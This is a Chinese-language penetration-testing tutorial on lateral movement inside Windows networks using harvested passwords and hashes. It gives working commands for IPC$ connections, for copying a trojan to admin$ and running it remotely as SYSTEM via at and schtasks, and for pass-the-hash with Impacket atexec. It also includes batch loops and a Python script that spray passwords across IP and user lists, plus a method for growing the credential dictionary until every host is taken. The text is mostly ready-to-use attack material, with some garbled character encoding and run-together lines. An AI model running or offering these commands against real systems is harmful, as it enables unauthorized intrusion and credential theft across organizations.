利用密碼傳遞

at&schtasks

在日常滲透中，我們在拿到入口點(diǎn)（Windows）之后，我們可以使用at&schtasks在目標(biāo)內(nèi)網(wǎng)利用密碼傳遞，進(jìn)行橫向滲透。

獲取主機(jī)/域主機(jī)權(quán)限
minikatz獲得密碼（明文、hash）
信息收集用戶名做字典
嘗試鏈接
添加計(jì)劃任務(wù)（at & schtasks）
執(zhí)行文件木馬、或者命令

windows 2012 以下 at

windows 2012 以上 schtasks

利用流程

簡歷IPC連接到目標(biāo)主機(jī)
拷貝要執(zhí)行的命令腳本到目標(biāo)主機(jī)
查看目標(biāo)時間，創(chuàng)建計(jì)劃任務(wù)（at schtasks）定時執(zhí)行copy到的腳本
刪除IPC

建立IPC失敗原因

1.你的系統(tǒng)不是NT或以上操作系統(tǒng).
2.對方?jīng)]有打開ipc$默認(rèn)共享。
3.不能成功連接目標(biāo)的139，445端口.
4.命令輸入錯誤.
5.用戶名或密碼錯誤.

常見錯誤

1.錯誤號5，拒絕訪問 ：很可能你使用的用戶不是管理員權(quán)限的，先提升權(quán)限；
2.錯誤號51，Windows 無法找到網(wǎng)絡(luò)路徑 : 網(wǎng)絡(luò)有問題；
3.錯誤號53，找不到網(wǎng)絡(luò)路徑 ：ip地址錯誤；目標(biāo)未開機(jī)；目標(biāo)lanmanserver服務(wù)未啟動；目標(biāo)有防火墻（端口過濾）；
4.錯誤號67，找不到網(wǎng)絡(luò)名 ：你的lanmanworkstation服務(wù)未啟動；目標(biāo)刪除了ipc$；
5.錯誤號1219，提供的憑據(jù)與已存在的憑據(jù)集沖突 ：你已經(jīng)和對方建立了一個ipc$，請刪除再連。
6.錯誤號1326，未知的用戶名或錯誤密碼 ：原因很明顯了；
7.錯誤號1792，試圖登錄，但是網(wǎng)絡(luò)登錄服務(wù)沒有啟動 ：目標(biāo)NetLogon服務(wù)未啟動。（連接域控會出現(xiàn)此情況）
8.錯誤號2242，此用戶的密碼已經(jīng)過期 ：目標(biāo)有帳號策略，強(qiáng)制定期要求更改密碼。

建立IPC空連接

net use \\xx.xx.xx.xx\ipc$ "" /user:""

建立完整的用戶名，密碼連接：

net use \\xx.xx.xx.xx\ipc$ "password" /user:"username"net use \\xx.xx.xx.xx\ipc$ "password" /user:域名\"username"net use \\192.168.3.25\ipc$ "admin!@#45" /user:test\jl

映射路徑：

net use z: \\xx.xx.xx.xx\c$ "密碼" /user:"用戶名" ?(即可將對方的c盤映射為自己的z盤，其他盤類推)

刪除

net use z: \\xx.xx.xx.xx\c$   #直接訪問net use c: /del     刪除映射的c盤，其他盤類推 net use * /del      刪除全部,會有提示要求按y確認(rèn)net use \\xx.xx.xx.xx\ipc$ /deldir \\xx.xx.xx.xx\c$  列文件copy \\xx.xx.xx.xx\c$\1.bat 1.bat  下載1.batcopy 1.bat \\xx.xx.xx.xx\C$ 復(fù)制文件net view xx.xx.xx.xx 查看對方共享

過程

C:\>net use \\xx.xx.xx.xx\IPC$ "admin" /user:"admintitrators" 用戶名是administrators，密碼為"admin"的IP地址，如果是打算攻擊的話，就可以用這樣的命令來與xx.xx.xx.xx建立一個連接，因?yàn)槊艽a為"admin"，所以第一個引號處輸入，后面一個雙引號里的是用戶名，輸入administrators，命令即可成功完成。

C:\>copy srv.exe \\xx.xx.xx.xx\admin$ 先復(fù)制srv.exe上去，目錄下就有（這里的$是指admin用戶的c:\winnt\system32\，大家還可以使用c$、d$，意思是C盤與D盤，這看你要復(fù)制到什么地方去了）

C:\>net time \\xx.xx.xx.xx 查查時間，發(fā)現(xiàn)xx.xx.xx.xx 的當(dāng)前時間是 2021/2/8 上午 11:00，命令成功完成。C:\>at \\xx.xx.xx.xx 11:05 srv.exe 用at命令啟動srv.exe吧

/S   system        指定要連接到的遠(yuǎn)程系統(tǒng)。如果省略這個系統(tǒng)參數(shù)，默認(rèn)是本地系統(tǒng)。 /U   username      指定應(yīng)在其中執(zhí)行 SchTasks.exe 的用戶上下文。 /P   [password]    指定給定用戶上下文的密碼。如果省略則提示輸入。 /RU  username      指定任務(wù)在其下運(yùn)行的“運(yùn)行方式”用戶                       帳戶(用戶上下文)。對于系統(tǒng)帳戶，有效                        值是 ""、"NT AUTHORITY\SYSTEM" 或                        "SYSTEM"。                       對于 v2 任務(wù)，"NT AUTHORITY\LOCALSERVICE"和                       "NT AUTHORITY\NETWORKSERVICE"以及常見的 SID                         對這三個也都可用。                         /RP  [password]    指定“運(yùn)行方式”用戶的密碼。要提示輸                       入密碼，值必須是 "*" 或無。系統(tǒng)帳戶會忽略該                       密碼。必須和 /RU 或 /XML 開關(guān)一起使用。
 
/RU/XML    /SC   schedule     指定計(jì)劃頻率。                       有效計(jì)劃任務(wù):  MINUTE、 HOURLY、DAILY、WEEKLY、                        MONTHLY, ONCE, ONSTART, ONLOGON, ONIDLE, ONEVENT./MO   modifier     改進(jìn)計(jì)劃類型以允許更好地控制計(jì)劃重復(fù)周期。有效值列于下面“修改者”部分中。/D    days         指定該周內(nèi)運(yùn)行任務(wù)的日期。有效值:                       MON、TUE、WED、THU、FRI、SAT、SUN                       和對 MONTHLY 計(jì)劃的 1 - 31                       (某月中的日期)。通配符“*”指定所有日期。/M    months       指定一年內(nèi)的某月。默認(rèn)是該月的第一天。                       有效值: JAN、FEB、MAR、APR、MAY、JUN、                       JUL、 AUG、SEP、OCT、NOV  和 DEC。通配符                       “*” 指定所有的月。/I    idletime     指定運(yùn)行一個已計(jì)劃的 ONIDLE 任務(wù)之前                       要等待的空閑時間。                       有效值范圍: 1 到 999 分鐘。/TN   taskname     指定唯一識別這個計(jì)劃任務(wù)的名稱。/TR   taskrun      指定在這個計(jì)劃時間運(yùn)行的程序的路徑和文件名。例如: C:\windows\system32\calc.exe/ST   starttime    指定運(yùn)行任務(wù)的開始時間。
                       時間格式為 HH:mm (24 小時時間)，例如 14:30 表示
                       2:30 PM。如果未指定 /ST，則默認(rèn)值為
                       當(dāng)前時間。/SC ONCE 必需有此選項(xiàng)。/RI   interval     用分鐘指定重復(fù)間隔。這不適用于                       計(jì)劃類型: MINUTE、HOURLY、                       ONSTART, ONLOGON, ONIDLE, ONEVENT.                       有效范圍: 1 - 599940 分鐘。                       如果已指定 /ET 或 /DU，則其默認(rèn)值為                       10 分鐘。/ET   endtime      指定運(yùn)行任務(wù)的結(jié)束時間。                       時間格式為 HH:mm (24 小時時間)，例如，14:50 表示 2:50 PM。                      這不適用于計(jì)劃類型: ONSTART、                       ONLOGON, ONIDLE, ONEVENT./DU   duration     指定運(yùn)行任務(wù)的持續(xù)時間。                       時間格式為 HH:mm。這不適用于 /ET 和                       計(jì)劃類型: ONSTART, ONLOGON, ONIDLE, ONEVENT.                      對于 /V1 任務(wù)，如果已指定 /RI，則持續(xù)時間默認(rèn)值為                       1 小時。 /K                 在結(jié)束時間或持續(xù)時間終止任務(wù)。                      這不適用于計(jì)劃類型: ONSTART、                       ONLOGON, ONIDLE, ONEVENT.                        必須指定 /ET 或 /DU。/SD   startdate    指定運(yùn)行任務(wù)的第一個日期。                       格式為 yyyy/mm/dd。默認(rèn)值為                       當(dāng)前日期。這不適用于計(jì)劃類型: ONCE、                       ONSTART, ONLOGON, ONIDLE, ONEVENT./ED   enddate      指定此任務(wù)運(yùn)行的最后一天的日期。                       格式是 yyyy/mm/dd。這不適用于計(jì)劃類型:                         ONCE、ONSTART、ONLOGON、ONIDLE。/EC   ChannelName  為 OnEvent 觸發(fā)器指定事件通道。/IT                僅有在 /RU 用戶當(dāng)前已登錄且                      作業(yè)正在運(yùn)行時才可以交互式運(yùn)行任務(wù)。                       此任務(wù)只有在用戶已登錄的情況下才運(yùn)行。/NP                不儲存任何密碼。任務(wù)以給定用戶的身份                       非交互的方式運(yùn)行。只有本地資源可用。/Z                 標(biāo)記在最終運(yùn)行完任務(wù)后刪除任務(wù)。/XML  xmlfile      從文件的指定任務(wù) XML 中創(chuàng)建任務(wù)。                       可以組合使用 /RU 和 /RP 開關(guān)，或者在任務(wù) XML 已包含                       主體時單獨(dú)使用 /RP。/V1                創(chuàng)建 Vista 以前的平臺可以看見的任務(wù)。                       不兼容 /XML。/F                 如果指定的任務(wù)已經(jīng)存在，則強(qiáng)制創(chuàng)建                       任務(wù)并抑制警告。/RL   level        為作業(yè)設(shè)置運(yùn)行級別。有效值為                       LIMITED 和 HIGHEST。默認(rèn)值為 LIMITED。/DELAY delaytime   指定觸發(fā)觸發(fā)器后延遲任務(wù)運(yùn)行的                       等待時間。時間格式為                       mmmm:ss。此選項(xiàng)僅對計(jì)劃類型                       ONSTART, ONLOGON, ONEVENT. /?                 顯示此幫助消息。

創(chuàng)建任務(wù)

schtasks /create /s xx.xx.xx.xx /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat

執(zhí)行任務(wù)

schtasks /run /s xx.xx.xx.xx /tn adduser /i 運(yùn)行這個任務(wù)

刪除任務(wù)

schtasks /delete /s xx.xx.xx.xx /tn adduser /f

使用第三方工具，自帶提權(quán)

D:\>atexec.exe tencent/administrator:123@.com@10.0.0.1 "whoami"Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies
[!] This will work ONLY on Windows >= Vista[*] Creating task \WqukoWZX[*] Running task \WqukoWZX[*] Deleting task \WqukoWZX[*] Attempting to read ADMIN$\Temp\WqukoWZX.tmp[*] Attempting to read ADMIN$\Temp\WqukoWZX.tmpnt authority\system        # 權(quán)限為system

impacket工具包，里面很多內(nèi)網(wǎng)用到的工具這個工具注意免殺atexec.exe ./administrator:123@.com@10.0.0.1 "whoami"atexec.exe tencent/administrator:123@.com@10.0.0.1 "whoami"atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@10.0.0.1 "whoami"

批量建立IPC鏈接

FOR /F %%i in (ips.txt) do net use \\%%i\ipc$ "admin!@#45" /user:administrator #批量檢測IP對應(yīng)明文連接FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami    #批量檢測IP對應(yīng)明文回顯版FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%i@10.0.0.1 whoami     #批量檢測明文對應(yīng)IP回顯版FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./administrator@10.0.0.1 whoami #批量檢測HASH對應(yīng)IP回顯版

程序運(yùn)行結(jié)束net use查看建立了哪些連接，剩下的就是使用自帶命令at&schtasks上傳腳本進(jìn)行控制。

net use \\192.168.3.32\ipc$ admin!@#45 /user:god\dbadmin
#pip install pyinstaller#pyinstaller -F fuck_neiwang_001.py 生成可執(zhí)行EXEimport os,timeips={    '192.168.3.21',    '192.168.3.25',    '192.168.3.29',    '192.168.3.30',    '192.168.3.31',    '192.168.3.33'}
users={    'Administrator',    'bossS',    'dbadmin',    'fileadmin',    'mack',    'mary',    'vpnadmin',    'webadmin'}passs={    'admin',    'admin!@#45',    'Admin12345'}
for ip in ips:    for user in users:        for mima in passs:            exec="net use \\"+ "\\"+ip+'\ipc$ '+mima+' /user:god\\'+user            print('--->'+exec+'<---')            os.system(exec)            time.sleep(1)

以上操作都是在我們知道用戶和密碼的情況下進(jìn)行驗(yàn)證的，前期除了收集明文密碼HASH等，還收集了用戶名，用戶名配合密碼字典，進(jìn)行上面的批量驗(yàn)證

主機(jī)A   收集主機(jī)A的用戶名和密碼  組成字典
主機(jī)B   用主機(jī)A的用戶信息驗(yàn)證是否可以登錄到主機(jī)B，如果可以登錄在收集主機(jī)B的用戶信息，將信息添加到上面的字典里。
主機(jī)C   用上面的字典驗(yàn)證是否可以登錄到主機(jī)C，如果可以登錄依舊收集相關(guān)信息添加到字典中

不斷重復(fù)上面步驟，收集的信息越多字典越大，我們驗(yàn)證成功的可能性越大，實(shí)現(xiàn)從獲得1臺主機(jī)到內(nèi)網(wǎng)中所有主機(jī)的操作